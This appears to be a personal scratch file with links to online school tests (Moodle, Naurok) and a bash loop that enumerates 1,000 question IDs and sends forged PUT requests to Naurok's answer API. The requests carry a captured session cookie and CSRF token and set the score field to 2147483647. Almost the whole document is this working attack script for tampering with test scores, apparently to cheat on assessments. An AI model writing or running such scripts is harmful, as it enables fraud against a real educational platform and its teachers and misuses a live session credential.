https://moodle.viti.edu.ua/mod/quiz/attempt.php?attempt=5201886&cmid=16&page=4
https://naurok.com.ua/test/join?gamecode=2515424&authuser=0
https://naurok.com.ua/test/complete/7b009424-f956-4762-a0e0-c018fae24907
for i in {000..999}; do
  q_id="42669${i}"
  echo "[+] Отправка question_id: $q_id"
  
  # --http2 заставляет curl использовать протокол HTTP/2, как на скрине
  curl -s -o /dev/null -w "Статус: %{http_code}\n" --http2 -X PUT "/api2/test/responses/answer HTTP/2" \
    -H "Host: naurok.com.ua" \
    -H "Cookie: _csrf=1bfabf4f5ce229cb66942d1be5acb9c6957b721734e89edbd4f5286aa8bc4b3ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22QallozMZwNpM4WU4mU2qHV5wNlimN3-o%22%3B%7D; PHPSESSID=q88vje8vqicrgdi9oq2g0g48sh; test_promo_text_grade_11=1" \
    -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" \
    -H "Accept: application/json, text/plain, */*" \
    -H "Accept-Language: en-US,en;q=0.5" \
    -H "Accept-Encoding: gzip, deflate, br" \
    -H "Content-Type: application/json;charset=utf-8" \
    -H "Referer: https://naurok.com.ua/test/testing/d84296eb-5427-4773-a320-3f4cd667fd5a" \
    -H "Origin: https://naurok.com.ua" \
    -H "Sec-Fetch-Dest: empty" \
    -H "Sec-Fetch-Mode: cors" \
    -H "Sec-Fetch-Site: same-origin" \
    -H "Priority: u=0" \
    -H "Te: trailers" \
    -d '{
  "session_id": 664113711,
  "answer": [
    "166867130"
  ],
  "question_id": "'"$q_id"'",
  "show_answer": 0,
  "type": "quiz",
  "point": "2147483647",
  "homeworkType": false,
  "homework": false
}'
  
  sleep 0.1
done
